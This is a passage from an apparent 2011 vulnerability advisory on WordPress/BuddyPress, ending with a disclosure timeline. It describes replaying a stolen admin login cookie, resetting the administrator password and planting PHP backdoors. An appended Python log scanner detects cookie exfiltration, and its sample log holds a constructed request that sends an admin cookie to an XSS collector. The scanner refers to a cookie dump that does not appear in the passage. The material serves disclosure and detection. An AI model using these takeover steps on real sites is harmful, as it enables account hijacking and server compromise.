By signing in as 'regularuser' and then editing his existing cookie to 'wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1' with the value
'admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4', the attacker has completely compromised the Buddypress components of the Wordpress installation, essentially signing in as the super administrator, and being able to do anything the administrator can do via Buddypress (for example, sending messages to all users of the Wordpress site).

Further, it is possible to completely compromise the Wordpress installation by then going to:

http://192.168.0.11/members/admin/settings/general/

And changing the administrator password, after which going to:

http://192.168.0.11/wp-admin/

Allows the attacker to control the whole Wordpress site as the super administrator (without even entering the new password).

By editing PHP files within the Wordpress directory tree, PHP shells or backdoors can be added, compromising the server.

To defend against this, simply upgrade outdated installations of Wordpress, Buddypress and the Blogs MU theme.
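Spotting this kind of cookie exfiltration in access or proxy logs, as an added example that is not part of the advisory: it parses combined-format log lines, URL-decodes every query parameter and looks for the WordPress wordpress_logged_in_<hash>=user|expiry|hmac structure shown in the cookies.txt dump above, reporting the leaked account and the cookie's expiry. The log lines are constructed (one modelled on the dump above, one benign); the hash and timestamp values are those the advisory shows.

```python
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (combined format) as a forward proxy or the
# receiving host would record them. The first carries the same kind of
# cookie dump shown in the advisory; the second is benign.
SAMPLE_LOG = """\
192.168.0.11 - - [21/Sep/2011:10:01:02 +0000] "GET /xss.php?t=test%20site%20%7C%20regularuser%20%7C%20Profile&c=wordpress_test_cookie%3DWP%20Cookie%20check%3B%20wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1%3Dadmin%7C1316627756%7C7c845a1bcf61927d4572ae0836ad7df4 HTTP/1.1" 200 12 "http://192.168.0.11/members/regularuser/profile/" "Mozilla/5.0"
192.168.0.12 - - [21/Sep/2011:10:02:17 +0000] "GET /members/regularuser/profile/?t=1 HTTP/1.1" 200 8412 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# WordPress login cookie: wordpress_logged_in_<32 hex>=<user>|<expiry epoch>|<hmac>
WP_LOGIN_RE = re.compile(r"wordpress_logged_in_[0-9a-f]{32}=([^|;]+)\|(\d+)\|([0-9a-f]+)")


def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding if any query parameter of the request carries a WordPress login cookie."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already decoded once; decode again to catch double-encoded values.
            hit = WP_LOGIN_RE.search(unquote_plus(value))
            if hit:
                user, expiry, _hmac = hit.groups()
                return {
                    "client": m.group("client"),
                    "referer": m.group("referer"),
                    "param": param,
                    "user": user,
                    "expires": datetime.fromtimestamp(int(expiry), tz=timezone.utc),
                }
    return None


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run scan_line over every line and keep the findings."""
    return [f for f in (scan_line(line) for line in lines) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['client']} leaked the login cookie of {f['user']!r} via ?{f['param']}= "
              f"(valid until {f['expires']:%Y-%m-%d %H:%M:%S} UTC), referer {f['referer']}")
```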

Timeline:

19 September 2011: vendor notified.
<=23 September 2011: Buddypress updated to 1.5 and Blogs Mu theme updated to 1.2.7, issues fixed.